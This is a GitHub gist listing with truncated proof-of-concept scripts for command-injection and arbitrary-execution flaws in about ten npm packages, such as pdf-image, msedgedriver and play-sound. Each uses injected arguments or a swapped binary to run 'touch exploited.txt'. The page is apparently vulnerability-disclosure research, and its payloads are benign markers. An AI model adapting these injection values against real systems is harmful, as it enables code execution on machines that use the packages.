Miguel Coimbra mcoimbra
mcoimbra
/ index.js
Last active
January 6, 2024 01:28
Package openssl: Function exec is called (#41) and a single argument ("command") is passed to the function, enabling the injection of commands. The package's exported openssl() function (see index.js in this gist) takes an 'opts' argument which has 'verb' field which can be the injection command, such as "| touch exploited.txt".
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * "index.js" is the package's file. | |
| */ | |
| 'use strict'; | |
| const util = require('util'); | |
| const fs = require('fs'); | |
| const { exec } = require('child_process'); | |
| const debug = util.debuglog('node-openssl'); |
mcoimbra
/ circle-github-bot_poc.js
Last active
November 29, 2023 19:01
Package circle-github-bot: The call to function curl (#28) in src/dist/index.js does not sanitize the parameters passed to exec(), enabling the injection of something like " | touch exploit.txt".
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('circle-github-bot'); | |
| const i = new pkg(); | |
| i.env = {}; | |
| // This will create a local 'exploited.txt' file. | |
| i.curl('', ' | touch exploited.txt', ''); |
mcoimbra
/ cssnano_poc.js
Last active
November 9, 2023 16:18
Package cssnano: Allows a custom function to be passed into its internals (#56 in src/index.js) which will then execute it. In this example an 'exploited.txt' file is created.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('cssnano'); | |
| const options = { | |
| preset: function() { | |
| const fs = require('node:fs'); | |
| let fd = fs.openSync('exploited.txt', 'a'); | |
| fs.closeSync(fd); |
mcoimbra
/ protractor-video-reporter-0.3.0_poc.js
Created
October 29, 2023 23:20
Package protractor-video-reporter: it is possible to take advantage of the 'options' argument of the VideoReporter constructor to execute a custom binary and arguments (authors only focus on ffmpeg executables...).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('protractor-video-reporter'); | |
| console.log(pkg); | |
| const options = { | |
| ffmpegCmd: 'touch', | |
| ffmpegArgs: ['exploited.txt'] | |
| } |
mcoimbra
/ postinstall-build-5.0.3_poc.js
Created
October 29, 2023 22:29
Package postinstall-build: it is possible to inject a custom command and arguments by pushing into process.argv.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('postinstall-build'); | |
| process.argv.push('touch'); | |
| process.argv.push('touch exploited.txt'); | |
| /* | |
| * This will lead to exec(cmd) with cmd = 'touch exploited.txt' on | |
| * line #326 of src/index.js. |
mcoimbra
/ pdf-merge-1.2.0_poc.js
Created
October 29, 2023 14:44
Package pdf-merge: it is possible to inject a custom binary and arguments for example to create a local file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('pdf-merge'); | |
| const args = ['exploited.txt', '']; | |
| const options = { | |
| libPath: 'touch' | |
| }; | |
| /* |
mcoimbra
/ pdf-image-2.0.0_poc.js
Created
October 29, 2023 14:27
Package pdf-image: it is possible to inject a custom command to be executed rather than imagemagick (the focus of this package).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('pdf-image'); | |
| console.log(pkg); | |
| const pdfFilePath = '" | touch exploited.txt "'; | |
| const options = { | |
| }; |
mcoimbra
/ msedgedriver-91.0.0_poc.js
Created
October 29, 2023 14:07
Package msedgedriver: it is possible to manipulate the binary and arguments passed to spawn by changing 'msedgedriver.path' and configuring 'args'.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('msedgedriver'); | |
| pkg.path = '/usr/bin/touch'; | |
| const args = ['exploited.txt']; | |
| const returnPromise = false; | |
| // This will create a local 'exploited.txt' file. |
mcoimbra
/ mocha-multi-reporters-1.5.1_poc.js
Created
October 29, 2023 13:57
Package mocha-multi-reporters: potential injection through 'require(name)' in src/lib/MultiReporters.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const fs = require('node:fs'); | |
| const path = require('node:path'); | |
| /* | |
| * Create a local 'custom.js' file so that the program flow can | |
| * continue within the call below. | |
| */ | |
| const filename = path.join(process.cwd(), 'custom.js'); |
mcoimbra
/ play-sound-1.1.5_poc.js
Last active
October 29, 2023 12:24
Package play-sound: function spawn is called (#40) with a parameter for the binary and another array parameter for arguments. It is possible to influence both through the main package class constructor and its play(…) method.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('play-sound'); | |
| const opts = { | |
| player: 'touch' | |
| }; | |
| const play = pkg(opts); | |
| const what = 'exploited.txt'; | |
| const options = { |
NewerOlder